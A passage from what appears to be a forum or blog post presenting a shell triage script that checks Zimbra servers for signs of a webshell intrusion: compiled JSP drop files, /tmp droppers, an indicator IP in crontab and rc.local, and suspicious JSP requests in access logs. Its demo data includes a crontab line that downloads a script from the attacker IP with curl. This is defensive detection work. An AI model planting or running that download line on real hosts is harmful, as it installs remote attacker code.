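#    indicator is the IP quoted in the thread; pass another string to reuse the function.
check_persistence_file() {
    target="$1"
    indicator="${2:-181.148.183.75}"
    [ -f "$target" ] || return 0
    grep -n -F "$indicator" "$target" || true
}

# 4. Access log: requests for a .jsp under /img/ or /downloads/, static-content directories
#    where the posters found the dropped files. A hit shows the file was reached, not only written.
find_jsp_requests() {
    access_log="$1"
    grep -E '"[A-Z]+ [^" ]*/(img|downloads)/[^" ?]*\.jsp' "$access_log" || true
}

# Constructed sample tree reproducing the shape of the findings above (sample data only).
build_constructed_tree() {
    root=$(mktemp -d)
    compiled="$root/opt/zimbra/jetty/work/zimbra/jsp/org/apache/jsp/img"
    webapp="$root/opt/zimbra/jetty/webapps/zimbra/img"
    mkdir -p "$compiled" "$webapp" "$root/tmp" "$root/etc" "$root/opt/zimbra/log"
    echo '<%-- constructed placeholder --%>' > "$webapp/Ab12.jsp"      # dropped file
    echo '// constructed placeholder' > "$compiled/Ab12_jsp.java"      # Jetty-compiled source
    : > "$compiled/Ab12_jsp.class"                                     # and its class file
    echo '<%-- shipped with the product --%>' > "$webapp/legit.jsp"
    touch -t 201901010000 "$webapp/legit.jsp"                          # old: must not match
    : > "$root/tmp/l.sh"
    : > "$root/tmp/s.sh"
    printf '0 0 * * *   root    curl http://181.148.183.75/reports/l.sh -L > /tmp/l.sh\n' \
        > "$root/etc/crontab"                                          # persisted line
    printf '#!/bin/sh\nexit 0\n' > "$root/etc/rc.local"                # clean
    printf '10.0.0.5 - - [02/Apr/2019:23:27:10 +0000] "GET /img/loading.gif HTTP/1.1" 200 312\n' \
        > "$root/opt/zimbra/log/access_log.2019-04-02"
    printf '10.0.0.5 - - [02/Apr/2019:23:27:41 +0000] "POST /img/Ab12.jsp HTTP/1.1" 200 1043\n' \
        >> "$root/opt/zimbra/log/access_log.2019-04-02"
    echo "$root"
}

# Run all four checks against a root prefix ("/" for a live host).
run_triage() {
    root="${1%/}"
    echo "== recent JSP artifacts under $root/opt/zimbra/jetty"
    find_recent_jsp_artifacts "$root/opt/zimbra/jetty"
    echo "== dropper files under $root/tmp"
    find_tmp_droppers "$root/tmp"
    for f in "$root/etc/crontab" "$root/etc/rc.local"; do
        echo "== indicator lines in $f"
        check_persistence_file "$f"
    done
    for log in "$root"/opt/zimbra/log/access_log.2019*; do
        [ -f "$log" ] || continue
        echo "== JSP requests in $log"
        find_jsp_requests "$log"
    done
}

# Demo against the constructed tree:  sh triage.sh --demo
if [ "${1:-}" = "--demo" ]; then
    run_triage "$(build_constructed_tree)"
fi
```

On a real host run `run_triage /` as root so that the jetty work directory and /etc are readable; the access-log pattern is deliberately narrow (JSP under /img/ or /downloads/) so that the normal JSP traffic of the webmail client does not drown the output, and the indicator string for the persistence check is a parameter because a different campaign will use a different host.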